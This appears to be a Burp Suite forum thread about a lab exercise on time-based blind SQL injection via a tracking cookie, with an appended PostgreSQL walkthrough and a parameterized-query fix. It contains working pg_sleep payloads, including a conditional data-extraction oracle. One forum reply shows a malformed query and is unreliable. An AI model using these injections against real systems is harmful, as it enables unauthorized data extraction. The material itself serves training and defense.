Burp Suite User Forum


Blind SQLi using Time delays

Ahmed | Last updated: Nov 27, 2021 12:41PM UTC

Hi there! I was solving the lab where the trackingID cookie is vulnerable to blind SQL injection and one has to cause a time delay of 10 seconds. My question is this: why do we have to concatenate our payload, '|| (SELECT pg_sleep(10))--, which works, while the AND operator, 'AND Select pg_sleep(10)--, does not work? Thanks in advance. Ahmed

Mauro | Last updated: Nov 28, 2021 05:32PM UTC

Hey Ahmed, I'm not an expert on the topic, but I think you're maybe mixing up string concatenation with the OR operator. So for example, the queries:

Fq6z9xEpntIshzQz' OR (SELECT pg_sleep(5))--
Fq6z9xEpntIshzQz' AND (SELECT pg_sleep(5))--

are not working examples, whereas:

Fq6z9xEpntIshzQz' || pg_sleep(5)--

does work.

Basically, it might help you to try to understand the way the query is constructed. Assuming the query is constructed like this:

SELECT tracking_id FROM user WHERE tracking_id = 'Fq6z9xEpntIshzQz' AND (SELECT pg_sleep(5))--;

then it is not a valid query, but:

SELECT tracking_id FROM 'Fq6z9xEpntIshzQz' || pg_sleep(10)--;

is. Hope that helps a little.

Ahmed | Last updated: Nov 29, 2021 07:54AM UTC

Yes, actually I think that tracking_id='FqasfgtRftyEz' is passed as a string, so we have to concatenate our payload rather than using the AND or OR operator. This is what I understood from my research on this.
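Added example, not part of the original thread: the queries the server ends up running for each of the payloads discussed above, written out in PostgreSQL so the type-checking difference between || and AND is visible. The table name tracked_users, the column name tracking_id and the string-concatenation template are assumptions for illustration; the lab's real schema is not shown in the thread.

```sql
-- Assumed vulnerable server-side template: the cookie value is spliced
-- into a string literal, so an injected single quote closes that literal.
--   SELECT tracking_id FROM tracked_users WHERE tracking_id = '<cookie>'
-- In each injected query below, the trailing '; is the application's own
-- closing quote, swallowed by the -- comment. If you paste these into
-- psql, terminate the statement with a semicolon on the following line.

-- 1. Payload  '||pg_sleep(10)--
--    || is the text concatenation operator. The closed literal is
--    concatenated with the result of pg_sleep(10), which is of type void
--    and is treated as text for the concatenation. The WHERE clause is
--    still "text = text", so the statement is valid, pg_sleep executes
--    while the row is evaluated, and the response takes about 10 s.
SELECT tracking_id FROM tracked_users
 WHERE tracking_id = 'Fq6z9xEpntIshzQz'||pg_sleep(10)--';

-- 2. Payload  ' AND (SELECT pg_sleep(10))--
--    AND requires boolean operands, but the subquery yields void.
--    PostgreSQL rejects the statement during parse analysis, before any
--    row is fetched, so pg_sleep never runs and there is no delay:
--      ERROR:  argument of AND must be type boolean, not type void
SELECT tracking_id FROM tracked_users
 WHERE tracking_id = 'Fq6z9xEpntIshzQz' AND (SELECT pg_sleep(10))--';

-- 3. The concatenation form with a condition, which is what turns the
--    delay into a data-extraction oracle: both CASE branches return void,
--    so || still type-checks, and the 10 s delay appears only when the
--    condition is true. Replace 1=1 with any boolean test on table data.
SELECT tracking_id FROM tracked_users
 WHERE tracking_id = 'Fq6z9xEpntIshzQz'||(SELECT CASE WHEN (1=1) THEN pg_sleep(10) ELSE pg_sleep(0) END)--';

-- Fix: bind the cookie as a parameter instead of concatenating it. The
-- payload is then compared as an ordinary string and never parsed as SQL,
-- so the lookup returns no row and takes no extra time.
PREPARE lookup_tracking(text) AS
  SELECT tracking_id FROM tracked_users WHERE tracking_id = $1;
EXECUTE lookup_tracking('Fq6z9xEpntIshzQz''||pg_sleep(10)--');
DEALLOCATE lookup_tracking;
```

The practical check when a time-based payload "does nothing" is to distinguish a query that ran without delay from a query that never ran at all: case 2 above fails at the type-check stage, so the application typically returns its generic error path immediately, whereas case 1 returns the normal page after the sleep. Keeping the injected expression in the same type as the literal it extends (text here) is what lets it pass that stage.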
